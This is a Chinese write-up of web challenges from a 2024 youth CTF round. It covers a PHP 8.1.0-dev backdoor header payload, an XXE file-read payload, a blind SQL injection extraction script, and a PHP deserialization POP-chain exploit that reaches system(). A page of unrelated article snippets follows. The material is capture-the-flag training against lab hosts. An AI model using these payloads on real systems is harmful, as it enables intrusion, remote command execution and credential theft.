青少年CTF擂台挑战赛 2024 #Round 1 Web方向题解 WP 全

EasyMD5

题目描述:php没有难题

考点总结:脑洞题目,不如我出(狗头

只允许两个都上传pdf文件。

image-20240229092322345

文件还不能太大了。burp多次发包发现要求两个pdf内容不一样

image-20240229092509262

不一样时候,提示我们MD5碰撞。

image-20240229092541336

科学计数法绕过

image-20240229092558829

PHP的后门

题目描述:PHP竟然也会有后门这种东西?你知道吗!

开题

image-20240229092726287

网络处查看版本

image-20240229093247617

PHP verion 8.1.0-dev的PHP在服务器上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。

影响版本:PHP 8.1.0-dev

payload:

User-Agentt:zerodiumsystem("nl /flag");

image-20240229093226411

PHP的XXE

题目描述:
XXE(XML External Entity)是一种针对XML解析器的攻击技术,也被称为XML外部实体注入攻击。当应用程序解析用户提供的XML输入时,如果没有正确地配置或过滤外部实体,攻击者可以利用这一漏洞执行恶意操作。

XML允许在文档中定义和使用外部实体,这些实体可以从外部资源(如文件、网络URL等)中获取数据。如果应用程序解析了包含恶意外部实体的XML输入,并且未对外部实体进行适当的处理或限制,攻击者可能会读取敏感文件、执行远程代码或进行其他恶意活动。

开题就是一个phpinfo

image-20240229132541732

目录扫半天扫不出来,根路由说无法XXE利用的。路由找不到怎么办呢,找原题呗。原题如下:

vulhub漏洞—php环境XML外部实体注入漏洞(XXE)_vulhub xxe-CSDN博客

路由:/simplexml_load_string.php

payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///flag" >]>
<root>
<name>&xxe;</name>
</root>

image-20240229201212935

Easy_SQLi

题目描述:Easy的SQLi

image-20240229234549679

起手万能密码,登录成果,但是只回显成果。猜测是盲注。

image-20240229234706004

盲注脚本:

import requests
import timeurl = "http://challenge.qsnctf.com:30028/login.php"payload = {"uname" : "","psw" : "123456",#"submit" : '%E6%8F%90%E4%BA%A4'
}
'''
payload = {"id" : ""
}
'''
result = ""
for i in range(1,100):l = 33r =130mid = (l+r)>>1while(l<r):# 跑库名#"-1\" or 0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(schema_name)/**/fROm/**/information_schema.schemata),{0},1))>{1})-- ".format(i, mid)# 跑表名#"-1\" or 0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(table_name)/**/fROm/**/information_schema.tables/**/wHERe/**/table_schema/**/like/**/'ctfshow'),{0},1))>{1})-- ".format(i, mid)# 跑列名#"-1\" or 0^" + "(ascii(substr((Select/**/groUp_coNcat(column_name)frOm/**/information_schema.columns/**/Where/**/table_name/**/like/**/'flagb'),{0},1))>{1})-- ".format(i,mid)########################"-1\" or 0^" + "(ascii(substr((select(flag4s)from(ctfshow.flagb)),{0},1))>{1})-- ".format(i, mid)#payload["uname"] ="-1\' or 0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(schema_name)/**/fROm/**/information_schema.schemata),{0},1))>{1})%23".format(i, mid)#payload="-1' or 0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(schema_name)/**/fROm/**/information_schema.schemata),{0},1))>{1})%23".format(i, mid)#payload="-1'%09or%090^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(table_name)/**/fROm/**/information_schema.tables/**/wHERe/**/table_schema/**/like/**/'qsnctf'),{0},1))>{1})#".format(i, mid)#payload="-1'%09or%090^" + "(ascii(substr((Select/**/groUp_coNcat(column_name)frOm/**/information_schema.columns/**/Where/**/table_name/**/like/**/'users'),{0},1))>{1})#".format(i, mid)payload="-1'%09or%090^" + "(ascii(substr((select groUp_coNcat(password) from qsnctf.users),{0},1))>{1})#".format(i, mid)#string类型+headers默认不url编码data='uname='+payload+'&psw=123456&submit=%E6%8F%90%E4%BA%A4'headers = {"Content-Type": "application/x-www-form-urlencoded"}#headers=headers,proxies={"http":"127.0.0.1:8081"}html = requests.post(url,data=data,headers=headers,proxies={"http":"127.0.0.1:8080"})print(payload)#print(html.text)if "successful" in html.text:l = mid+1else:r = midmid = (l+r)>>1if(chr(mid)==" "):breakresult = result + chr(mid)print(result)
print("flag: " ,result)#information_schema,mysql,performance_schema,qsnctf,test
#users
#USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password
#qsnctf{3789220d6cca472e97298c4da4b2fa22}

image-20240301000739548

雏形系统

题目描述:今天是公司里的工程师小王被裁员的日子,但小王并没有闲着。在离开之前,他突发奇想,决定留下一份特别的礼物给公司,于是他设计了一个登录页面的雏形。

开题,是登录,不能爆破不能注入

image-20240301124810173

扫出路由/www.zip,里面有源码

image-20240301124816334

源码如下:

<!DOCTYPE html>
<html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Login Page</title><style>body {font-family: Arial, sans-serif;background-color: #f0f0f0;padding: 20px;}.container {max-width: 400px;margin: 0 auto;background-color: #fff;padding: 20px;border-radius: 5px;box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);}.alert {padding: 10px;background-color: #f8d7da;color: #721c24;border-radius: 5px;margin-bottom: 10px;}form {margin-bottom: 20px;}form input[type="text"],form input[type="password"],form input[type="submit"] {width: 100%;padding: 10px;margin-bottom: 10px;border: 1px solid #ccc;border-radius: 3px;}form input[type="submit"] {background-color: #007bff;color: #fff;border: none;cursor: pointer;}</style>
</head><body>
<div class="container"><h1>Welcome to the login testing page!</h1><hr><?php$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iS1hwSnRScmdxVU9IY0Zld3lvUFNXbkNidmtmTUlkbXh6c0VMWVpCVkdoRE51YUFUbFFqaVRhTWh5UUpVclpudHFlS0JzTndSY2ttbG9kVkFTWXBXeGpMRWJJZkNndk9GdWl6RFBHWEh3TzlCaXR6VFNtelVTZ0NzcXA5c2EzaFBxZzlzWWdQdUlzVUJURGpUbUh6VVNtZlhsZ2V4cXNmeGlnZFRTbXpVU3RqVFNtelVTbXpVU21mQlljaGppY0FVaGc1UEt0RzdtSHpVU216VVNtelVxdENIbGdQWFNtUUJiYUZ4bkJOVVNtelVTbXpVU3RmMWJwV01ic2ZwWWM1WFlnUG9sSGZWYTNRb1ozUXNpYzVrVG1QN21IelVTbXpVU216VVNtelVTbVEwaWdQeEVENXVJYXYwblhNR0RlTk5odFFOaWFBeXdrZnZxM0FNbkJOVVNtelVTbXpVU3QwVFNtelVTdDBUU216VVNnRmpiYUZ4U3RZb21IelVTbWY3bUh6VVNtelVTbXpVcXRDSGxnUFhTbVF4SWFVN21IelVTbXpVU216VXF0Q0hsZ1BYU21RdkkyWjdtSHpVU216VVNtelVxdENIbGdQWFNtUU1sa1FQbGtRTWwyNDdtSHpVU216VVNtelVxdENIbGdQWFNnSTFscEYwaWM5dVNlOVZJZ0N4WXRoMWIzR05UYWpUU216VVNtelVTbXpVU216VUljRk5sc3pIUmdkVUN0aDVTdEZQcXBQdmxnUDZJUmZGSVJMSG5CTlVTbXpVU216VVNtelVTbXpkWWd2TXFzMCtpYzV4cWdDWFltVU1uQk5VU216VVNtelVTdDBUU216VVNtelVTbWZwWWM1WFlnUG9sSGZNbGtGQkljRjBUbVA3bUh6VVNtelVTbXpVU216VVNnUHBUbVEwaWdQeEVENXhJYVU5d1JZSGwzZGtoSGJkWWd2TXFzMCtiY1lQd0Qwa0ljUGtpdFFQSWM0a1RHTlVTbXpVU216VVNtelVTbWY3bUh6VVNtelVTbXpVU216VVNtelVTbWZQYjJ2b1NtUTBpZ1B4RUQ1TWxrUVBsa1FNbDI0N21IelVTbXpVU216VVNtelVTdDBUU216VVNtelVTbXpVU216VUljRk5sc3pIOGgrSXZETDQ1bFRmOGgrU2pIUzdtSHpVU216VVNtelVWR05VU216VVZHTlRTbXpVU2dGamJhRnhTTFFQbGM4VFNtelVTdGpUU216VVNtelVTbWZCWWNoamljQVVoZ0w3bUh6VVNtelVTbXpVcTNRdllnUFhTZ0kxbHBGMGljOXVTZTlWYjJlamxlRjBiYVFNYnNVZGJjRjBpYzl1RW16ZElnOE1tSHpVU216VVNtelVLQk5VU216VVNtelVTbXpVU21ma2xnOUhiY0JVaGdTN21IelVTbXpVU216VVNtelVTbVFIVG1RZGwxakJhUmQ3bUh6VVNtelVTbXpVVkdOVVNtelVWR05UU216VVNtUUhTTzBVaGU5R0QxRlpjc1lCYmFGeFkyOXNJbVlZbkJOVVNtelVoZ0xVd1J6ZGExZndaMVFsaDNDeElhaHViYzFQaDEwN21IelVTbWZ6WWM1eElhaE1iY1dNS3BaTmhnTE1uQk5VU216VWljYlVUbWVNcTNGUFltVWRiSGRNU3RqVFNtelVTbXpVU21mUGIydm9TbVM5d0QwOXdEMDl3RDA5d0QwOXdEMDl3RDFHRGVOVVJjNUJZYUdVY2M5MXFIZm5iYzFQU0QwOXdEMDl3RDA5d0QwOXdEMDl3RDA5d1JTN21IelVTbWY5bUh6VVNtZk1JSFVkYkQwOWgyZWRsY1B1aHNicGhnUzl3UlNraXhlcFljdjFoM0FVWWdDeFltZmRJYzFvU0hkVFNtelVTdGpUU216VVNtelVTbWZQYjJ2b1RtRWtwbG9Qb0lhcEhoT1BITThIVERqVFNtelVTdDBUbUh6VVNtei93VT09IjsgIAogICAgICAgIGV2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksICAgIAogICAgICAgICRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));?><form method="POST"><input type="text" name="username" placeholder="Username" required><input type="password" name="password" placeholder="Password" required><input type="submit" value="Login"></form></div>
</body></html>

解码后:

<?php
//$O00OO0='n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j';
//$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};
//$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};
//$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
//$O00OO0=n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j
//echo $O00OO0;
//echo "\n";
//$O00O0O=base64_decode
//echo $O00O0O;
//echo "\n";
//$OO0O00=strtr
//echo $OO0O00;
//echo "\n";
//$O00O0O=base64_decode
//echo $O00O0O;
//echo "\n";//eval(base64_decode("JE8wTzAwMD0iS1hwSnRScmdxVU9IY0Zld3lvUFNXbkNidmtmTUlkbXh6c0VMWVpCVkdoRE51YUFUbFFqaVRhTWh5UUpVclpudHFlS0JzTndSY2ttbG9kVkFTWXBXeGpMRWJJZkNndk9GdWl6RFBHWEh3TzlCaXR6VFNtelVTZ0NzcXA5c2EzaFBxZzlzWWdQdUlzVUJURGpUbUh6VVNtZlhsZ2V4cXNmeGlnZFRTbXpVU3RqVFNtelVTbXpVU21mQlljaGppY0FVaGc1UEt0RzdtSHpVU216VVNtelVxdENIbGdQWFNtUUJiYUZ4bkJOVVNtelVTbXpVU3RmMWJwV01ic2ZwWWM1WFlnUG9sSGZWYTNRb1ozUXNpYzVrVG1QN21IelVTbXpVU216VVNtelVTbVEwaWdQeEVENXVJYXYwblhNR0RlTk5odFFOaWFBeXdrZnZxM0FNbkJOVVNtelVTbXpVU3QwVFNtelVTdDBUU216VVNnRmpiYUZ4U3RZb21IelVTbWY3bUh6VVNtelVTbXpVcXRDSGxnUFhTbVF4SWFVN21IelVTbXpVU216VXF0Q0hsZ1BYU21RdkkyWjdtSHpVU216VVNtelVxdENIbGdQWFNtUU1sa1FQbGtRTWwyNDdtSHpVU216VVNtelVxdENIbGdQWFNnSTFscEYwaWM5dVNlOVZJZ0N4WXRoMWIzR05UYWpUU216VVNtelVTbXpVU216VUljRk5sc3pIUmdkVUN0aDVTdEZQcXBQdmxnUDZJUmZGSVJMSG5CTlVTbXpVU216VVNtelVTbXpkWWd2TXFzMCtpYzV4cWdDWFltVU1uQk5VU216VVNtelVTdDBUU216VVNtelVTbWZwWWM1WFlnUG9sSGZNbGtGQkljRjBUbVA3bUh6VVNtelVTbXpVU216VVNnUHBUbVEwaWdQeEVENXhJYVU5d1JZSGwzZGtoSGJkWWd2TXFzMCtiY1lQd0Qwa0ljUGtpdFFQSWM0a1RHTlVTbXpVU216VVNtelVTbWY3bUh6VVNtelVTbXpVU216VVNtelVTbWZQYjJ2b1NtUTBpZ1B4RUQ1TWxrUVBsa1FNbDI0N21IelVTbXpVU216VVNtelVTdDBUU216VVNtelVTbXpVU216VUljRk5sc3pIOGgrSXZETDQ1bFRmOGgrU2pIUzdtSHpVU216VVNtelVWR05VU216VVZHTlRTbXpVU2dGamJhRnhTTFFQbGM4VFNtelVTdGpUU216VVNtelVTbWZCWWNoamljQVVoZ0w3bUh6VVNtelVTbXpVcTNRdllnUFhTZ0kxbHBGMGljOXVTZTlWYjJlamxlRjBiYVFNYnNVZGJjRjBpYzl1RW16ZElnOE1tSHpVU216VVNtelVLQk5VU216VVNtelVTbXpVU21ma2xnOUhiY0JVaGdTN21IelVTbXpVU216VVNtelVTbVFIVG1RZGwxakJhUmQ3bUh6VVNtelVTbXpVVkdOVVNtelVWR05UU216VVNtUUhTTzBVaGU5R0QxRlpjc1lCYmFGeFkyOXNJbVlZbkJOVVNtelVoZ0xVd1J6ZGExZndaMVFsaDNDeElhaHViYzFQaDEwN21IelVTbWZ6WWM1eElhaE1iY1dNS3BaTmhnTE1uQk5VU216VWljYlVUbWVNcTNGUFltVWRiSGRNU3RqVFNtelVTbXpVU21mUGIydm9TbVM5d0QwOXdEMDl3RDA5d0QwOXdEMDl3RDFHRGVOVVJjNUJZYUdVY2M5MXFIZm5iYzFQU0QwOXdEMDl3RDA5d0QwOXdEMDl3RDA5d1JTN21IelVTbWY5bUh6VVNtZk1JSFVkYkQwOWgyZWRsY1B1aHNicGhnUzl3UlNraXhlcFljdjFoM0FVWWdDeFltZmRJYzFvU0hkVFNtelVTdGpUU216VVNtelVTbWZQYjJ2b1RtRWtwbG9Qb0lhcEhoT1BITThIVERqVFNtelVTdDBUbUh6VVNtei93VT09IjsgIAogICAgICAgIGV2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksICAgIAogICAgICAgICRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
//$O0O000="KXpJtRrgqUOHcFewyoPSWnCbvkfMIdmxzsELYZBVGhDNuaATlQjiTaMhyQJUrZntqeKBsNwRckmlodVASYpWxjLEbIfCgvOFuizDPGXHwO9BitzTSmzUSgCsqp9sa3hPqg9sYgPuIsUBTDjTmHzUSmfXlgexqsfxigdTSmzUStjTSmzUSmzUSmfBYchjicAUhg5PKtG7mHzUSmzUSmzUqtCHlgPXSmQBbaFxnBNUSmzUSmzUStf1bpWMbsfpYc5XYgPolHfVa3QoZ3Qsic5kTmP7mHzUSmzUSmzUSmzUSmQ0igPxED5uIav0nXMGDeNNhtQNiaAywkfvq3AMnBNUSmzUSmzUSt0TSmzUSt0TSmzUSgFjbaFxStYomHzUSmf7mHzUSmzUSmzUqtCHlgPXSmQxIaU7mHzUSmzUSmzUqtCHlgPXSmQvI2Z7mHzUSmzUSmzUqtCHlgPXSmQMlkQPlkQMl247mHzUSmzUSmzUqtCHlgPXSgI1lpF0ic9uSe9VIgCxYth1b3GNTajTSmzUSmzUSmzUSmzUIcFNlszHRgdUCth5StFPqpPvlgP6IRfFIRLHnBNUSmzUSmzUSmzUSmzdYgvMqs0+ic5xqgCXYmUMnBNUSmzUSmzUSt0TSmzUSmzUSmfpYc5XYgPolHfMlkFBIcF0TmP7mHzUSmzUSmzUSmzUSgPpTmQ0igPxED5xIaU9wRYHl3dkhHbdYgvMqs0+bcYPwD0kIcPkitQPIc4kTGNUSmzUSmzUSmzUSmf7mHzUSmzUSmzUSmzUSmzUSmfPb2voSmQ0igPxED5MlkQPlkQMl247mHzUSmzUSmzUSmzUSt0TSmzUSmzUSmzUSmzUIcFNlszH8h+IvDL45lTf8h+SjHS7mHzUSmzUSmzUVGNUSmzUVGNTSmzUSgFjbaFxSLQPlc8TSmzUStjTSmzUSmzUSmfBYchjicAUhgL7mHzUSmzUSmzUq3QvYgPXSgI1lpF0ic9uSe9Vb2ejleF0baQMbsUdbcF0ic9uEmzdIg8MmHzUSmzUSmzUKBNUSmzUSmzUSmzUSmfklg9HbcBUhgS7mHzUSmzUSmzUSmzUSmQHTmQdl1jBaRd7mHzUSmzUSmzUVGNUSmzUVGNTSmzUSmQHSO0Uhe9GD1FZcsYBbaFxY29sImYYnBNUSmzUhgLUwRzda1fwZ1Qlh3CxIahubc1Ph107mHzUSmfzYc5xIahMbcWMKpZNhgLMnBNUSmzUicbUTmeMq3FPYmUdbHdMStjTSmzUSmzUSmfPb2voSmS9wD09wD09wD09wD09wD09wD1GDeNURc5BYaGUcc91qHfnbc1PSD09wD09wD09wD09wD09wD09wRS7mHzUSmf9mHzUSmfMIHUdbD09h2edlcPuhsbphgS9wRSkixepYcv1h3AUYgCxYmfdIc1oSHdTSmzUStjTSmzUSmzUSmfPb2voTmEkploPoIapHhOPHM8HTDjTSmzUSt0TmHzUSmz/wU==";
//echo $O0OO00($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000), $OO0O00($O0O000,0,$OO0000));
//echo base64_decode('PD9waHAKICAgIGVycm9yX3JlcG9ydGluZygwKTsKCiAgICBjbGFzcyBzaGkKICAgIHsKICAgICAgICBwdWJsaWMgJG5leHQ7CiAgICAgICAgcHVibGljICRwYXNzOwogICAgICAgIHB1YmxpYyBmdW5jdGlvbiBfX3RvU3RyaW5nKCl7CiAgICAgICAgICAgICR0aGlzLT5uZXh0OjpQTFooJHRoaXMtPnBhc3MpOwogICAgICAgIH0KICAgIH0KICAgIGNsYXNzIHdvCiAgICB7CiAgICAgICAgcHVibGljICRzZXg7CiAgICAgICAgcHVibGljICRhZ2U7CiAgICAgICAgcHVibGljICRpbnRlbnRpb247CiAgICAgICAgcHVibGljIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKXsKICAgICAgICAgICAgZWNobyAiSGkgVHJ5IHNlcmlhbGl6ZSBNZSEiOwogICAgICAgICAgICAkdGhpcy0+aW5zcGVjdCgpOwogICAgICAgIH0KICAgICAgICBmdW5jdGlvbiBpbnNwZWN0KCl7CiAgICAgICAgICAgIGlmKCR0aGlzLT5zZXg9PSdib3knJiYkdGhpcy0+YWdlPT0nZWlnaHRlZW4nKQogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBlY2hvICR0aGlzLT5pbnRlbnRpb247CiAgICAgICAgICAgIH0KICAgICAgICAgICAgZWNobyAi8J+ZhTE45bKB8J+IsiI7CiAgICAgICAgfQogICAgfQoKICAgIGNsYXNzIERlbW8KICAgIHsKICAgICAgICBwdWJsaWMgJGE7CiAgICAgICAgc3RhdGljIGZ1bmN0aW9uIF9fY2FsbFN0YXRpYygkYWN0aW9uLCAkZG8pCiAgICAgICAgewogICAgICAgICAgICBnbG9iYWwgJGI7CiAgICAgICAgICAgICRiKCRkb1swXSk7CiAgICAgICAgfQogICAgfQoKICAgICRiID0gJF9QT1NUWydwYXNzd29yZCddOwogICAgJGEgPSAkX1BPU1RbJ3VzZXJuYW1lJ107CiAgICBAdW5zZXJpYWxpemUoJGEpOwogICAgaWYgKCFpc3NldCgkYikpIHsKICAgICAgICBlY2hvICI9PT09PT09PT09PT09PT09PT1QTFogSW5wdXQgWW91ciBOYW1lIT09PT09PT09PT09PT09PT09PSI7CiAgICB9CiAgICBpZigkYT09J2FkbWluJyYmJGI9PSInazFmdWh1J3MgdGVzdCBkZW1vIikKICAgIHsKICAgICAgICBlY2hvKCLnmbvlvZXmiJDlip8iKTsKICAgIH0KCiAgICA/Pg==');
error_reporting(0);class shi
{public $next;public $pass;public function __toString(){$this->next::PLZ($this->pass);}
}
class wo
{public $sex;public $age;public $intention;public function __destruct(){echo "Hi Try serialize Me!";$this->inspect();}function inspect(){if($this->sex=='boy'&&$this->age=='eighteen'){echo $this->intention;}echo "🙅18岁🈲";}
}class Demo
{public $a;static function __callStatic($action, $do){global $b;$b($do[0]);}
}$b = $_POST['password'];
$a = $_POST['username'];
@unserialize($a);
if (!isset($b)) {echo "==================PLZ Input Your Name!==================";
}
if($a=='admin'&&$b=="'k1fuhu's test demo")
{echo("登录成功");
}

接下来打反序列化。

链子:wo::__destruct()->wo::inspect()->shi::__toString()->Demo::__callStatic($action, $do)

POC:

<?php
error_reporting(0);class shi
{public $next;public $pass;public function __toString(){$this->next::PLZ($this->pass);}
}
class wo
{public $sex;public $age;public $intention;public function __destruct(){echo "Hi Try serialize Me!";$this->inspect();}function inspect(){if($this->sex=='boy'&&$this->age=='eighteen'){echo $this->intention;}echo "🙅18岁🈲";}
}class Demo
{public $a;static function __callStatic($action, $do){global $b;$b($do[0]);}
}//wo::__destruct()->wo::inspect()->shi::__toString()->Demo::__callStatic($action, $do)$x=new wo();
$x->age='eighteen';
$x->sex='boy';
$x->intention=new shi();
$x->intention->next=new Demo();
$arr[0]='ls';
$x->intention->pass='nl /f*';echo serialize($x);//$b = 'system';
//$a = 'O:2:"wo":3:{s:3:"sex";s:3:"boy";s:3:"age";s:8:"eighteen";s:9:"intention";O:3:"shi":2:{s:4:"next";O:4:"Demo":1:{s:1:"a";N;}s:4:"pass";a:1:{i:0;s:3:"dir";}}}';
//@unserialize($a);
//if (!isset($b)) {
//    echo "==================PLZ Input Your Name!==================";
//}
//if($a=='admin'&&$b=="'k1fuhu's test demo")
//{
//    echo("登录成功");
//}

传参:

username=O:2:"wo":3:{s:3:"sex";s:3:"boy";s:3:"age";s:8:"eighteen";s:9:"intention";O:3:"shi":2:{s:4:"next";O:4:"Demo":1:{s:1:"a";N;}s:4:"pass";s:6:"nl /f*";}}&password=system

image-20240301142204717

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/715680.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

把Anaconda添加进环境变量的方法(解决pip识别不到环境的问题)

找到你的Anaconda的安装根目录 比如我的是在&#xff1a;C:\ProgramData\Anaconda3 那么只需要将以下目录添加进环境变量即可&#xff1a; C:\ProgramData\Anaconda3C:\ProgramData\Anaconda3\ScriptsC:\ProgramData\Anaconda3\Library\binC:\ProgramData\Anaconda3\condabin…

吴恩达deeplearning.ai:通过偏差与方差进行诊断

以下内容有任何不理解可以翻看我之前的博客哦&#xff1a;吴恩达deeplearning.ai专栏 文章目录 偏差与方差高偏差高方差合适的模型理解偏差与方差 总结 当你构建神经网络的时候&#xff0c;几乎没有人能够在一开始就将神经系统构建得十分完美。因此构建神经网络最重要的是直到…

Qt 简约又简单的加载动画 第七季 音量柱风格

今天和大家分享两个音量柱风格的加载动画,这次的加载动画的最大特点就是简单,只有几行代码. 效果如下: 一共三个文件,可以直接编译运行 //main.cpp #include "LoadingAnimWidget.h" #include <QApplication> #include <QGridLayout> int main(int argc…

寻找峰值[中等]

优质博文IT-BLOG-CN 一、题目 峰值元素是指其值严格大于左右相邻值的元素。给你一个整数数组nums&#xff0c;找到峰值元素并返回其索引。数组可能包含多个峰值&#xff0c;在这种情况下&#xff0c;返回 任何一个峰值 所在位置即可。 你可以假设nums[-1] nums[n] -∞。 你…

python统计分析——泊松回归

参考资料&#xff1a;用python动手学统计学 概率分布为泊松分布、联系函数为对数函数的广义线性模型叫作泊松回归。解释变量可以有多个&#xff0c;连续型和分类型的解释变量也可以同时存在。 1、案例说明 分析不同气温与啤酒销量的关系。构造不同气温下的销量的数学模型&…

Unity--自动版面(Horizontal Layout Croup)||Unity--自动版面(Vertical Layout Group)

Unity--自动版面&#xff08;Horizontal Layout Croup&#xff09; Horizontal Layout Croup&#xff1a; “水平布局组”组件将其子布局元素并排放置。它们的宽度由各自的最小&#xff0c;首选和灵活的宽度决定&#xff0c;具体取决于以下模型&#xff1a; 所有子布局元素的…

el-form里面表单遍历渲染,里面放el-row,一行放3个表单怎么实现

需求&#xff1a; 需要实现 el-form里面的表单遍历渲染&#xff0c;里面放el-row,一行放3个表单怎么实现&#xff1f; 废话不多说直接上demo <el-form ref"form" :model"form" label-width"80px"><el-row v-for"(row, index) in M…

BUGKU bp

打开环境&#xff0c;他提示了弱密码top1000&#xff0c;随便输入密码123抓包爆破 发现长度都一样&#xff0c;看一下响应发现一段js代码&#xff0c;若r值为{code: bugku10000}&#xff0c;则会返回错误&#xff0c;通过这一句“window.location.href success.php?coder.cod…

计算机二级Python刷题笔记------基本操作题11、14、17、21、30(考察列表)

文章目录 第十一题&#xff08;列表遍历&#xff09;第十四题&#xff08;len&#xff09;第十七题&#xff08;len、insert&#xff09;第二十一题&#xff08;append&#xff09;第三十题&#xff08;二维列表&#xff09; 第十一题&#xff08;列表遍历&#xff09; 题目&a…

springcloud和基础服务的搭建以及封装

代码仓库地址&#xff1a;https://github.com/zhaoyiwen-wuxian/springcloud-common page分页也进行了封装&#xff0c;只需要添加到pom中&#xff0c;将会自动进行分页&#xff0c;并且后端不需要写任何的分页数据。只需要前端自己传分页参数即可&#xff0c;并且里面封装了很…

Hololens 2应用开发系列(2)——MRTK基础知识及配置文件配置(上)

Hololens 2应用开发系列&#xff08;2&#xff09;——MRTK基础知识及配置文件配置 一、前言二、MRTK基础知识2.1 MRTK概述2.2 MRTK运行逻辑2.3 MRTK配置文件介绍2.4 MRTK服务 三、配置文件使用3.1 总配置文件3.2 相机配置3.3 其他配置 参考文献 一、前言 在前面的文章中&…

使用 Docker 部署 Answer 问答平台

1&#xff09;介绍 GitHub&#xff1a;https://github.com/apache/incubator-answer Answer 问答社区是在线平台&#xff0c;让用户提出问题并获得回答。用户可以发布问题并得到其他用户的详细答案、建议或信息。回答可以投票或评分&#xff0c;有助于确定有用的内容。标签和分…

Ps:历史记录面板

Ps菜单&#xff1a;窗口/历史记录 Window/History 历史记录 History面板提供了对图像编辑过程中所进行更改的深入控制&#xff0c;可以让用户回溯并查看每一步操作&#xff0c;从而允许用户轻松撤销错误或比较不同的编辑效果。 ◆ ◆ ◆ 常用操作方法与技巧 “历史记录”面板…

CentOS7设置虚拟机语言为中文

1.查看本地安装的语言 locale -a 是一个Linux命令&#xff0c;用于列出系统中可用的所有区域设置&#xff08;locales&#xff09;它包含了各种语言和地区的不同设置。 打开终端&#xff08;右键open terminal&#xff09;输入 locale -a 查看本地安装的语言&#xff1a; 其中z…

一些可以访问gpt的方式

1、Coze扣子是新一代 AI 大模型智能体开发平台。整合了插件、长短期记忆、工作流、卡片等丰富能力&#xff0c;扣子能帮你低门槛、快速搭建个性化或具备商业价值的智能体&#xff0c;并发布到豆包、飞书等各个平台。https://www.coze.cn/ 2、https://poe.com/ 3、插件阿里…

EasyRecovery16电脑硬盘数据恢复软件功能详解

在数字化时代&#xff0c;人们在日常生活和工作中越来越依赖于电脑和移动设备。不管是个人用户还是企业&#xff0c;数据的重要性都不言而喻。然而&#xff0c;数据丢失和损坏的风险也随之增加&#xff0c;因此&#xff0c;数据恢复软件的需求也日益增长。 EasyRecovery 16是一…

【打工日常】使用docker部署在线Photopea用于linux下替代ps

一、Photopea介绍 linux没有ps适配&#xff0c;对于有时候工作来说确实不方便&#xff0c;我找了很久&#xff0c;才找到了一款功能可以跟ps接近的在线软件&#xff0c;使用docker部署就可以了。它是ps的最佳替代品之一&#xff0c;其界面几乎与ps相同&#xff0c;只不过它是在…

Springboot+vue的医药管理系统(有报告)。Javaee项目,springboot vue前后端分离项目。

演示视频&#xff1a; Springbootvue的医药管理系统&#xff08;有报告&#xff09;。Javaee项目&#xff0c;springboot vue前后端分离项目。 项目介绍&#xff1a; 采用M&#xff08;model&#xff09;V&#xff08;view&#xff09;C&#xff08;controller&#xff09;三层…

云轴科技ZStack与华东师范大学共建产教融合基地

近日&#xff0c;上海云轴信息科技有限公司&#xff08;云轴科技ZStack&#xff09;与华东师范大学上海国际首席技术官学院宣布&#xff0c;共同打造产教融合基地&#xff0c;以促进人才培养与产业需求的全方位融合。这一举措旨在深化教育与产业的合作关系&#xff0c;培养更多…

实战 | 使用YOLOv8图像分割实现路面坑洞检测(步骤 + 代码)

